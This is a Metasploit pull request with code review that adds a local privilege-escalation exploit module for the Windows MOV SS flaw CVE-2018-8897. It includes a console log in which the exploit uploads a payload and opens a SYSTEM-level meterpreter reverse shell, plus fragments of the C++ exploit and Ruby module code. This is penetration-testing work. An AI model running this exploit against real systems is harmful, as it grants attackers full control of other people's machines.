### PR TITLE
First stab at cve-2018-8897

### PR DESCRIPTION
**Pull request by bwatters-r7**
This is still pretty ugly, but it works.

It uses a pre-compiled binary I stole almost verbatim from https://github.com/can1357/CVE-2018-8897 and turned into a VS solution.

Todo:
Break into functions
Run Rubocop
Actually verify target versions
Cleanup script
general code cleanup
Automate final copy of binary to data directory
Clean out debug output from exe
(longer-term... like next week) turn this into a reflective dll injection

Example:
```
msf5 exploit(windows/local/cve-2018-8897-exe) > show options

Module options (exploit/windows/local/cve-2018-8897-exe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXPLOIT_NAME                   no        The filename to use for the exploit binary (%RAND% by default).
   PATH                           no        Path to write binaries (%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT     4536             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/local/cve-2018-8897-exe) > unset DisablePayloadHandler 
Unsetting DisablePayloadHandler...
msf5 exploit(windows/local/cve-2018-8897-exe) > run

[*] Started reverse TCP handler on 192.168.135.111:4536 
[*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1
[*] Generating EXE payload (PRQeuUMofXxhU.exe)
[*] /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe
[+] Payload uploaded on DESKTOP-QGIC71I to C:\Users\msfuser\AppData\Local\Temp\rJtnWbQrhJBrI.exe
[*] C:\Users\msfuser\AppData\Local\Temp\PRQeuUMofXxhU.exe
[+] Payload uploaded on DESKTOP-QGIC71I to C:\Users\msfuser\AppData\Local\Temp\rJtnWbQrhJBrI.exe
[*] Running exploit C:\Users\msfuser\AppData\Local\Temp\rJtnWbQrhJBrI.exe with payload C:\Users\msfuser\AppData\Local\Temp\PRQeuUMofXxhU.exe
[*] Sending stage (206403 bytes) to 192.168.132.183
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/cve-2018-8897-exe) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-QGIC71I\msfuser @ DESKTOP-QGIC71I  192.168.135.111:4567 -> 192.168.132.183:49709 (192.168.132.183)
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-QGIC71I      192.168.135.111:4536 -> 192.168.132.183:49716 (192.168.132.183)

```

### CODE REVIEW

**Comment by bwatters-r7** [comment]
I might also need to include the license file from https://github.com/can1357/CVE-2018-8897.  My bad.

**Comment by wvu-r7** [comment]
I think you committed two modules. We prefer underscores.

**Comment by wchen-r7** [comment]
@bwatters-r7 I have a PR that cleans up the Ruby code: https://github.com/bwatters-r7/metasploit-framework/pull/1

**Comment by wchen-r7** [comment]
# Release Notes

This adds a local privilege escalation exploit for CVE-2018-8897, a MOV SS vulnerability specifically against Windows x64.

File: documentation/modules/exploit/windows/local/mov_ss.md [hunk 1]
```diff
@@ -0,0 +1,10 @@
+# Description
+
+This module exploits a MOV SS vulnerability that is specifically made against Microsoft Windows
+(excpet for Windows XP). It will upload a pre-compiled exploit onto the target machine, followed
```
Comment (bcoles) [inline documentation/modules/exploit/windows/local/mov_ss.md]: `expect`

File: external/source/exploits/cve-2018-8897-exe/README.md [hunk 2]
```diff
@@ -0,0 +1,12 @@
+# CVE-2018-8897
+Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
```
Comment (bcoles) [inline external/source/exploits/cve-2018-8897-exe/README.md]: `privileges`

File: external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp [hunk 3]
```diff
@@ -0,0 +1,387 @@
...
+
+	assert( ThreadHandle );
+	printf( "\n- Created context watchdog\n" );
+	printf( "- Thread Id:       %16llx\n", ( HANDLE ) GetThreadId( ThreadHandle ) );
+
+	assert( SetThreadPriority( ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL ) );
+	printf( "- Elevated priority to: THREAD_PRIORITY_TIME_CRITICAL\n" );
+	SetThreadAffinityMask( ThreadHandle, 0xFFFFFFFE );
+	SetThreadAffinityMask( HANDLE( -2 ), 0x00000001 );
+	printf( "- Seperated exploit and context watchdog processors\n" );
```
Comment (bcoles) [inline external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp]: `Separated`

File: modules/exploits/windows/local/mov_ss.rb [hunk 4]
```diff
@@ -0,0 +1,174 @@
...
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in a statement in the system programming guide
+        of the Intel 64 and IA-32 architectures software developer's manual being mishandled
+        in various operating system kerneles, resulting in unexpected behavior for #DB
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `kernels`

File: modules/exploits/windows/local/mov_ss.rb [hunk 5]
```diff
@@ -0,0 +1,174 @@
...
+        excpetions that are deferred by MOV SS or POP SS.
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `exceptions`

File: modules/exploits/windows/local/mov_ss.rb [hunk 6]
```diff
@@ -0,0 +1,174 @@
...
+      OptString.new('PATH',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+        [false, 'The number of seconds to delay before executing the exploit', 3])
+    ])
+  end
+
+  def setup
+    super
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `Rex::Text.rand_text_alpha` now accepts a range.

`Rex::Text.rand_text_alpha(6..14)`

File: modules/exploits/windows/local/mov_ss.rb [hunk 7]
```diff
@@ -0,0 +1,174 @@
...
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `Rex::Text.rand_text_alpha` now accepts a range.

`Rex::Text.rand_text_alpha(6..14)`

File: modules/exploits/windows/local/mov_ss.rb [hunk 8]
```diff
@@ -0,0 +1,174 @@
...
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `end_with?` is preferred over regex.

```ruby
    @exploit_name = "#{exploit_name}.exe" unless exploit_name.downcase.end_with?('.exe')

File: modules/exploits/windows/local/mov_ss.rb [hunk 9]
```diff
@@ -0,0 +1,174 @@
...
+    @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: `end_with?` is preferred over regex.

```ruby
    @payload_name = "#{payload_name}.exe" unless payload_name.downcase.end_with?('.exe')
```

File: modules/exploits/windows/local/mov_ss.rb [hunk 10]
```diff
@@ -0,0 +1,174 @@
...
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    if sysinfo['OS'] =~ /XP/
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: No need for regex.

```ruby
if sysinfo['OS'].include? 'XP'
```

File: modules/exploits/windows/local/mov_ss.rb [hunk 11]
```diff
@@ -0,0 +1,174 @@
...
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    if file?(path)
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: A guard clause would keep the method logic out of the conditional.

Similarly, the rescue-from-method technique would be cleaner.

```ruby
  def ensure_clean_destination(path)
    return unless file? path

    print_status("#{path} already exists on the target. Deleting...")
    file_rm(path)
    print_status("Deleted #{path}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    print_error("Unable to delete #{path}")
  end
```

File: modules/exploits/windows/local/mov_ss.rb [hunk 12]
```diff
@@ -0,0 +1,174 @@
...
+
+  def execute_exploit
+    sleep(datastore['EXECUTE_DELAY'])
+    print_status("Running exploit #{exploit_path} with payload #{payload_path}")
+    output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
+    vprint_status(output)
+  end
+
+  def exploit
+    begin
```
Comment (bcoles) [inline modules/exploits/windows/local/mov_ss.rb]: Using the rescue-from-method technique would be cleaner than wrapping the method in a begin/rescue block.

```ruby
def exploit
  # ...
rescue Rex::Post::Meterpreter::RequestError => e
  elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  print_error(e.message)
  ensure_clean_exploit_destination
  ensure_clean_payload_destination
end
```

**Pull request merged**